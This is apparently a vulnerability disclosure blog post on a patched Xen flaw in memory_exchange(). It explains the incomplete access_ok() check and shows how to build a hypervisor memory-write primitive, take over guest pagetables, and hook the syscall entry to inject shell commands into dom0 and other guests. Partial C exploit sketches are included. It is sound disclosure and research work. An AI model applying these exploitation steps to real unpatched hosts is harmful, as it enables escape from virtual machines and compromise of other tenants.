Pandavirtualization: Exploiting the Xen Hypervisor

Posted by Jann Horn

On 2017-03-14, I reported a bug to Xen's security team that permits an attacker with control over the kernel of a paravirtualized x86-64 Xen guest to break out of the hypervisor and gain full control over the machine's physical memory. The Xen Project publicly released an advisory and a patch for this issue on 2017-04-04.

To demonstrate the impact of the issue, I created an exploit that, when executed in one 64-bit PV guest with root privileges, will execute a shell command as root in all other 64-bit PV guests (including dom0) on the same physical machine.

Background

access_ok()

On x86-64, Xen PV guests share the virtual address space with the hypervisor. The rough memory layout looks as follows:


Xen allows the guest kernel to perform hypercalls, which are essentially normal system calls from the guest kernel to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, with up to six arguments passed in registers. Like normal syscalls, Xen hypercalls often take guest pointers as arguments. Because the hypervisor shares its address space, it makes sense for guests to simply pass in guest-virtual pointers.
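For illustration, here is a minimal sketch of how a guest kernel could issue such a hypercall, assuming it uses the syscall instruction directly rather than the hypercall page that Xen normally provides; the constants are quoted from Xen's public headers, and the register convention is the syscall-like one described above:

#include <stdint.h>

#define __HYPERVISOR_memory_op 12   /* from xen/include/public/xen.h */
#define XENMEM_exchange        11   /* from xen/include/public/memory.h */

/* Issue a two-argument hypercall: number in %rax, arguments in %rdi/%rsi;
 * the syscall instruction itself clobbers %rcx and %r11. */
static inline long hypercall2(unsigned long nr, unsigned long a1,
                              unsigned long a2)
{
    long ret;
    asm volatile("syscall"
                 : "=a"(ret)
                 : "0"(nr), "D"(a1), "S"(a2)
                 : "rcx", "r11", "memory");
    return ret;
}

/* Usage (sketch): hypercall2(__HYPERVISOR_memory_op, XENMEM_exchange,
 *                            (unsigned long)&xchg_args); */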

Like any kernel, Xen has to ensure that guest-virtual pointers don't actually point to hypervisor-owned memory before dereferencing them. It does this using userspace accessors that are similar to those in the Linux kernel; for example:

  • access_ok(addr, size) for checking whether a guest-supplied virtual memory range is safe to access - in other words, it checks that accessing the memory range will not modify hypervisor memory
  • __copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd without checking whether hnd is safe
  • copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole memory range from addr to addr+size-1 is safe to access, using any memory access pattern. However, Xen's access_ok() doesn't guarantee that much:

/*
 * Valid if in +ve half of 48-bit address space, or above Xen-reserved area.
 * This is also valid for range checks (addr, addr+size). As long as the
 * start address is outside the Xen-reserved area then we will access a
 * non-canonical address (and thus fault) before ever reaching VIRT_START.
 */
#define __addr_ok(addr) \
   (((unsigned long)(addr) < (1UL<<47)) || \
    ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

#define access_ok(addr, size) \
   (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))

Xen usually only checks that addr points into the userspace area or the kernel area without checking size. If the actual guest memory access starts roughly at addr, proceeds linearly without skipping gigantic amounts of memory, and bails out as soon as a guest memory access fails, only checking addr is sufficient because of the large range of non-canonical addresses, which serve as a large guard area. However, if a hypercall wants to access a guest buffer starting at a 64-bit offset, it needs to ensure that the access_ok() check is performed using the right offset - checking the whole userspace buffer is unsafe!

Xen provides wrappers around access_ok() for accessing arrays in guest memory. If you want to check whether it's safe to access an array starting at element 0, you can use guest_handle_okay(hnd, nr). However, if you want to check whether it's safe to access an array starting at a different element, you need to use guest_handle_subrange_okay(hnd, first, last).
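To make the difference concrete, here is an illustrative sketch (not actual Xen code) of a handler that writes one element to a guest array at a guest-controlled 64-bit index; the first check is the unsafe pattern, the second is the correct one:

/*
 * Illustrative sketch only: write one element to a guest array at a
 * guest-controlled 64-bit index `first`.
 */
static int write_one_entry(XEN_GUEST_HANDLE(xen_pfn_t) hnd,
                           unsigned long nr, unsigned long first,
                           xen_pfn_t value)
{
    /* UNSAFE: validates the array as if access started at element 0.
     * A huge `first` pushes hnd + 8*first far past the checked range,
     * potentially into hypervisor memory, yet this check still passes. */
    if ( !guest_handle_okay(hnd, nr) )
        return -EFAULT;

    /* SAFE: validates exactly the element range that will be touched. */
    if ( !guest_handle_subrange_okay(hnd, first, first) )
        return -EFAULT;

    if ( __copy_to_guest_offset(hnd, first, &value, 1) )
        return -EFAULT;
    return 0;
}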

When I saw the definition of access_ok(), the lack of security guarantees actually provided by access_ok() seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone might be using it in an unsafe way.

Hypercall Preemption

When e.g. a scheduler tick happens, Xen needs to be able to quickly switch from the currently executing vCPU to another VM's vCPU. However, simply interrupting the execution of a hypercall won't work (e.g. because the hypercall could be holding a spinlock), so Xen (like other operating systems) needs a mechanism to delay the vCPU switch until it's safe to do so.

In Xen, hypercalls are preempted using voluntary preemption: any long-running hypercall code is expected to regularly call hypercall_preempt_check() to check whether the scheduler wants to switch to another vCPU. If that is the case, the hypercall code exits to the guest, thereby signalling to the scheduler that it's safe to preempt the currently-running task, after adjusting the hypercall arguments (in guest registers or guest memory) so that, as soon as the current vCPU is scheduled again, it will re-enter the hypercall and perform the remaining work. Hypercalls don't distinguish between normal hypercall entry and hypercall re-entry after preemption.

This hypercall re-entry mechanism is used in Xen because Xen does not have one hypervisor stack per vCPU; it only has one hypervisor stack per physical core. This means that while other operating systems (e.g. Linux) can simply leave the state of an interrupted syscall on the kernel stack, Xen can't do that as easily.

This design means that for some hypercalls, to allow them to properly resume their work, additional data is stored in guest memory that could potentially be manipulated by the guest to attack the hypervisor.
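The general shape of this pattern looks roughly as follows. This is a simplified sketch modeled on memory_exchange(), which is introduced in the next section; it is not a verbatim copy of the Xen code, and details such as chunk ordering and the continuation format string may differ:

    /* Simplified sketch of the voluntary-preemption pattern described above. */
    for ( i = resume_offset_read_from_guest_memory; i < nr_total; i++ )
    {
        if ( hypercall_preempt_check() )
        {
            /* Store progress where the re-entered hypercall will find it
             * (here: in guest-writable memory), then arrange for the
             * hypercall to be re-executed once this vCPU runs again. */
            exch.nr_exchanged = i;
            if ( __copy_field_to_guest(arg, &exch, nr_exchanged) )
                return -EFAULT;
            return hypercall_create_continuation(
                __HYPERVISOR_memory_op, "lh", XENMEM_exchange, arg);
        }

        /* ... exchange one chunk of pages ... */
    }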

memory_exchange()

The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the function memory_exchange(arg) in xen/common/memory.c. This function allows a guest to "trade in" a list of physical pages that are currently assigned to the guest in exchange for new physical pages with different restrictions on their physical contiguity. This is useful for guests that want to perform DMA, because DMA requires physically contiguous buffers.

The hypercall takes a struct xen_memory_exchange as argument, which is defined as follows:

struct xen_memory_reservation {
   /* [...] */
   XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page list */

   /* Number of extents, and size/alignment of each (2^extent_order pages). */
   xen_ulong_t    nr_extents;
   unsigned int   extent_order;

   /* XENMEMF flags. */
   unsigned int   mem_flags;

   /*
    * Domain whose reservation is being changed.
    * Unprivileged domains can specify only DOMID_SELF.
    */
   domid_t        domid;
};

struct xen_memory_exchange {
   /*
    * [IN] Details of memory extents to be exchanged (GMFN bases).
    * Note that @in.address_bits is ignored and unused.
    */
   struct xen_memory_reservation in;

   /*
    * [IN/OUT] Details of new memory extents.
    * We require that:
    *  1. @in.domid == @out.domid
    *  2. @in.nr_extents  << @in.extent_order ==
    *     @out.nr_extents << @out.extent_order
    *  3. @in.extent_start and @out.extent_start lists must not overlap
    *  4. @out.extent_start lists GPFN bases to be populated
    *  5. @out.extent_start is overwritten with allocated GMFN bases
    */
   struct xen_memory_reservation out;

   /*
    * [OUT] Number of input extents that were successfully exchanged:
    *  1. The first @nr_exchanged input extents were successfully
    *     deallocated.
    *  2. The corresponding first entries in the output extent list correctly
    *     indicate the GMFNs that were successfully exchanged.
    *  3. All other input and output extents are untouched.
    *  4. If not all input extents are exchanged then the return code of this
    *     command will be non-zero.
    *  5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!
    */
   xen_ulong_t nr_exchanged;
};

The fields that are relevant for the bug are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents and nr_exchanged.

nr_exchanged is documented as always being initialized to zero by the guest - this is because it is not only used to return a result value, but also for hypercall preemption. When memory_exchange() is preempted, it stores its progress in nr_exchanged, and the next execution of memory_exchange() uses the value of nr_exchanged to determine at which point in the input arrays in.extent_start and out.extent_start it should resume.

Originally, memory_exchange() did not check the userspace array pointers at all before accessing them with __copy_from_guest_offset() and __copy_to_guest_offset(), which do not perform any checks themselves - so by supplying hypervisor pointers, it was possible to cause Xen to read from and write to hypervisor memory - a pretty severe bug. This was discovered in 2012 (XSA-29, CVE-2012-5513) and fixed as follows (https://xenbits.xen.org/xsa/xsa29-4.1.patch):

diff --git a/xen/common/memory.c b/xen/common/memory.c
index 4e7c234..59379d3 100644
--- a/xen/common/memory.c
+++ b/xen/common/memory.c
@@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)
        goto fail_early;
    }
+    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
+         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
+    {
+        rc = -EFAULT;
+        goto fail_early;
+    }
+
    /* Only privileged guests can allocate multi-page contiguous extents. */
    if ( !multipage_allocation_permitted(current->domain,
                                         exch.in.extent_order) ||

The bug

As can be seen in the following code snippet, the 64-bit resumption offset nr_exchanged, which can be controlled by the guest because of Xen's hypercall resumption scheme, can be used by the guest to choose an offset from out.extent_start at which the hypervisor should write:

static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg)
{
   [...]

   /* Various sanity checks. */
   [...]

   if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
        !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
   {
       rc = -EFAULT;
       goto fail_early;
   }

   [...]

   for ( i = (exch.nr_exchanged >> in_chunk_order);
         i < (exch.in.nr_extents >> in_chunk_order);
         i++ )
   {
       [...]
       /* Assign each output page to the domain. */
       for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )
       {
           [...]
           if ( !paging_mode_translate(d) )
           {
               [...]
               if ( __copy_to_guest_offset(exch.out.extent_start,
                                           (i << out_chunk_order) + j,
                                           &mfn, 1) )
                   rc = -EFAULT;
           }
       }
       [...]
   }
   [...]
}

However, the guest_handle_okay() check only verifies whether it would be safe to access the guest array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would have been correct. This means that an attacker can write an 8-byte value to an arbitrary address in hypervisor memory by choosing:

  • exch.in.extent_order and exch.out.extent_order as 0 (exchanging page-sized blocks of physical memory for new page-sized blocks)
  • exch.out.extent_start and exch.nr_exchanged so that exch.out.extent_start points to userspace memory while exch.out.extent_start+8*exch.nr_exchanged points to the target address in hypervisor memory, with exch.out.extent_start close to NULL; this can be calculated as exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
  • exch.in.nr_extents and exch.out.nr_extents as exch.nr_exchanged+1
  • exch.in.extent_start as input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate guest kernel pointer to a physical page number that is currently owned by the guest). This is guaranteed to always point into the guest userspace range (and therefore pass the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address range, and the hypervisor and guest kernel address ranges together are only as large as the userspace address range.

The value that is written to the attacker-controlled address is a physical page number (the physical address divided by the page size).
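The parameter choices from the list above can be expressed as a short computation. The following sketch uses simplified stand-ins for the Xen ABI types (the real extent_start fields are guest handles rather than raw pointers); input_buffer is assumed to be a guest-kernel pointer to a PFN the guest currently owns, as described above:

#include <stdint.h>

/* Simplified stand-ins; real code would use xen/include/public/memory.h. */
typedef uint64_t xen_pfn_t;
typedef uint16_t domid_t;
#define DOMID_SELF ((domid_t)0x7FF0U)

struct xen_memory_reservation {
    xen_pfn_t   *extent_start;   /* simplified: the real ABI wraps this in a guest handle */
    uint64_t     nr_extents;
    unsigned int extent_order;
    unsigned int mem_flags;
    domid_t      domid;
};

struct xen_memory_exchange {
    struct xen_memory_reservation in;
    struct xen_memory_reservation out;
    uint64_t nr_exchanged;
};

/* Derive the hypercall arguments for a chosen hypervisor target address. */
static void build_exchange_args(struct xen_memory_exchange *x,
                                uint64_t target_addr, xen_pfn_t *input_buffer)
{
    uint64_t nr = target_addr / 8;

    x->nr_exchanged     = nr;                               /* resumption offset */
    x->out.extent_start = (xen_pfn_t *)(target_addr % 8);   /* near NULL, passes access_ok() */
    x->in.extent_start  = (xen_pfn_t *)((uint64_t)input_buffer - 8 * nr);
    x->in.nr_extents    = nr + 1;
    x->out.nr_extents   = nr + 1;
    x->in.extent_order  = 0;
    x->out.extent_order = 0;
    x->in.mem_flags     = 0;
    x->out.mem_flags    = 0;
    x->in.domid         = DOMID_SELF;
    x->out.domid        = DOMID_SELF;
}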

Exploiting the bug: Gaining pagetable control

Especially on a busy system, controlling the page numbers that are written by the kernel might be difficult. Therefore, for reliable exploitation, it makes sense to treat the bug as a primitive that permits repeatedly writing 8-byte values at controlled addresses, with the most significant bits being zeroes (because of the limited amount of physical memory) and the least significant bits being more or less random. For my exploit, I decided to treat this primitive as one that writes an essentially random byte followed by 7 bytes of garbage.

It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor, for the following reasons:

  • x86-64 PV guests know the real physical page numbers of all pages they can access
  • x86-64 PV guests can map live pagetables (from all 4 paging levels) belonging to their domain as readonly; Xen only prevents mapping them as writable
  • Xen maps all physical memory as writable at 0xffff830000000000 (in other words, the hypervisor can write to any physical page, independent of the protections with which it is mapped elsewhere, by writing to physical_address+0xffff830000000000); a small helper computing this address is sketched after this list.
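The last point is just arithmetic; here is a tiny sketch (the macro name is a stand-in for the constant given above, not the identifier used in the Xen source):

#include <stdint.h>

#define DIRECTMAP_BASE 0xffff830000000000ULL  /* writable map of all physical memory */
#define PAGE_SIZE_4K   4096ULL

/* Hypervisor-virtual address at which physical page number `pfn` is mapped
 * writable, as described in the list above. */
static inline uint64_t directmap_addr(uint64_t pfn, uint64_t offset_in_page)
{
    return DIRECTMAP_BASE + pfn * PAGE_SIZE_4K + offset_in_page;
}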

The goal of the attack is to point an entry in a live level 3 pagetable (which I'll call the "victim pagetable") to a page to which the guest has write access (which I'll call the "fake pagetable"). This means that the attacker has to write an 8-byte value, containing the physical page number of the fake pagetable and some flags, into an entry in the victim pagetable, and ensure that the following 8-byte pagetable entry stays disabled (e.g. by setting the first byte of the following entry to zero). Essentially, the attacker has to write 9 controlled bytes followed by 7 bytes that don't matter.

Because the physical page numbers of all relevant pages and the address of the writable mapping of all physical memory are known to the guest, figuring out where to write and what value to write is easy, so the only remaining problem is how to use the primitive to actually write data.

Because the attacker wants to use the primitive to write to a readable page, the "write one random byte followed by 7 bytes of garbage" primitive can easily be converted to a "write one controlled byte followed by 7 bytes of garbage" primitive by repeatedly writing a random byte and reading it back until the value is right. Then, the "write one controlled byte followed by 7 bytes of garbage" primitive can be converted to a "write controlled data followed by 7 bytes of garbage" primitive by writing bytes to consecutive addresses - and that's exactly the primitive needed for the attack.
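A sketch of this conversion follows; the helpers trigger_random_write() and read_byte() are hypothetical, with the former assumed to fire the memory_exchange primitive against the given address and the latter to read the byte back through the guest's read-only mapping of the victim page:

#include <stddef.h>
#include <stdint.h>

/* Hypothetical helpers: fire the memory_exchange primitive at `addr`
 * (writing one essentially random byte plus 7 bytes of garbage), and read a
 * byte back via the guest's read-only mapping of the same page. */
void trigger_random_write(uint64_t addr);
uint8_t read_byte(uint64_t addr);

static void write_controlled_bytes(uint64_t target, const uint8_t *data,
                                   size_t len)
{
    /* Go front to back: each write clobbers the 7 bytes after it with
     * garbage, but those are fixed up by later iterations; only the 7 bytes
     * past the end stay garbage, which the attack tolerates. */
    for (size_t i = 0; i < len; i++) {
        do {
            trigger_random_write(target + i);
        } while (read_byte(target + i) != data[i]);
    }
}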

At this point, the attacker controls a live pagetable, which allows the attacker to map arbitrary physical memory into the guest's virtual address space. This means that the attacker can reliably read from and write to the memory, both code and data, of the hypervisor and all other VMs on the system.

Running shell commands in other VMs

At this point, the attacker has full control over the machine, equivalent to the privilege level of the hypervisor, and can easily steal secrets by searching through physical memory; a realistic attacker probably wouldn't want to inject code into VMs, considering how much more detectable that makes an attack.

But running an arbitrary shell command in other VMs makes the severity more obvious (and it looks cooler), so for fun, I decided to extend my exploit so that it injects a shell command into all other 64-bit PV domains.

As a first step, I wanted to reliably gain code execution in hypervisor context. Given the ability to read and write physical memory, one relatively OS- (or hypervisor-)independent way to call an arbitrary address with kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry with DPL 3 and raise the interrupt. (Intel's upcoming Cannon Lake CPUs are apparently going to support User-Mode Instruction Prevention (UMIP), which will finally make SIDT a privileged instruction.) Xen supports SMEP and SMAP, so it isn't possible to just point the IDT entry at guest memory, but using the ability to write pagetable entries, it is possible to map a guest-owned page with hypervisor-context shellcode as non-user-accessible, which allows it to run despite SMEP.
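Here is a minimal sketch of the first half of that technique, reading the IDT base from guest context with sidt; crafting a DPL-3 interrupt gate at that base and triggering the chosen vector is omitted:

#include <stdint.h>

/* 10-byte descriptor written by the sidt instruction in 64-bit mode. */
struct __attribute__((packed)) idt_descriptor {
    uint16_t limit;
    uint64_t base;
};

/* sidt is (pre-UMIP) executable from any privilege level, so even a guest
 * can learn where the hypervisor's IDT lives in virtual memory. */
static uint64_t read_idt_base(void)
{
    struct idt_descriptor desc;
    asm volatile("sidt %0" : "=m"(desc));
    return desc.base;
}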

Then, in hypervisor context, it is possible to hook the syscall entry point by reading and writing the IA32_LSTAR MSR. The syscall entry point is used both for syscalls from guest userspace and for hypercalls from guest kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register state and invoking sysret, it is possible to divert the execution of guest userspace code to arbitrary guest user shellcode, independent of the hypervisor or the guest operating system.
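Conceptually, the hypervisor-context payload only has to do something like the following sketch; the MSR number is the architecturally defined IA32_LSTAR, and hook_entry is a hypothetical pointer to the attacker's replacement entry stub that eventually jumps back to the original:

#include <stdint.h>

#define MSR_LSTAR 0xC0000082u   /* IA32_LSTAR: syscall/hypercall entry point */

static inline uint64_t rdmsr(uint32_t msr)
{
    uint32_t lo, hi;
    asm volatile("rdmsr" : "=a"(lo), "=d"(hi) : "c"(msr));
    return ((uint64_t)hi << 32) | lo;
}

static inline void wrmsr(uint32_t msr, uint64_t val)
{
    asm volatile("wrmsr" :: "c"(msr), "a"((uint32_t)val),
                            "d"((uint32_t)(val >> 32)));
}

static uint64_t orig_lstar;

/* Remember the original entry point, then divert it to the hook. */
static void hook_syscall_entry(void (*hook_entry)(void))
{
    orig_lstar = rdmsr(MSR_LSTAR);
    wrmsr(MSR_LSTAR, (uint64_t)hook_entry);
}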

My exploit injects shellcode into all guest userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running with root privileges and whether a lockfile doesn't exist in the guest's filesystem yet. If these conditions are fulfilled, it uses the clone() syscall to create a child process that runs an arbitrary shell command.

(Note: My exploit doesn't clean up after itself on purpose, so when the attacking domain is shut down later, the hooked entry point will quickly cause the hypervisor to crash.)

Here is a screenshot of a successful attack against Qubes OS 3.2, which uses Xen as its hypervisor. The exploit is executed in the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 and the firewallvm:



Conclusion

I believe that the root cause of this issue was the weak security guarantees made by access_ok(). The current version of access_ok() was committed in 2005, two years after the first public release of Xen and long before the first XSA was released. It seems like old code tends to contain relatively straightforward weaknesses more often than newer code because it was committed with less scrutiny regarding security issues, and such old code is then often left alone.

When security-relevant code is optimized based on assumptions, care must be taken to reliably prevent those assumptions from being violated. access_ok() actually used to check whether the whole range overlaps hypervisor memory, which would have prevented this bug from occurring. Unfortunately, in 2005, a commit with "x86_64 fixes/cleanups" changed the behavior of access_ok() on x86_64 to the current one. As far as I can tell, the only reason this didn't immediately make the MEMOP_increase_reservation and MEMOP_decrease_reservation hypercalls vulnerable is that the nr_extents argument of do_dom_mem_op() was only 32 bits wide - a relatively brittle defense.

While there have been several Xen vulnerabilities that only affected PV guests because the issues were in code that is unnecessary when dealing with HVM guests, I believe that this isn't one of them. Accessing guest virtual memory is much more straightforward for PV guests than for HVM guests: for PV guests, raw_copy_from_guest() calls copy_from_user(), which basically just does a bounds check followed by a memcpy with pagefault fixup - the same thing normal operating system kernels do when accessing userspace memory. For HVM guests, raw_copy_from_guest() calls copy_from_user_hvm(), which has to do a page-wise copy (because the memory area might be physically non-contiguous and the hypervisor doesn't have a contiguous virtual mapping of it) with guest pagetable walks (to translate guest virtual addresses to guest physical addresses) and guest frame lookups for every page, including reference counting, mapping guest pages into hypervisor memory and various checks to e.g. prevent HVM guests from writing to readonly grant mappings. So for HVM, the complexity of handling guest memory accesses is actually higher than for PV.

For security researchers, I think that a lesson from this is that paravirtualization is not much harder to understand than normal kernels. If you've audited kernel code before, the hypercall entry path (lstar_enter and int80_direct_trap in xen/arch/x86/x86_64/entry.S) and the basic design of hypercall handlers (for x86 PV: listed in the pv_hypercall_table in xen/arch/x86/pv/hypercall.c) should look more or less like normal syscalls.
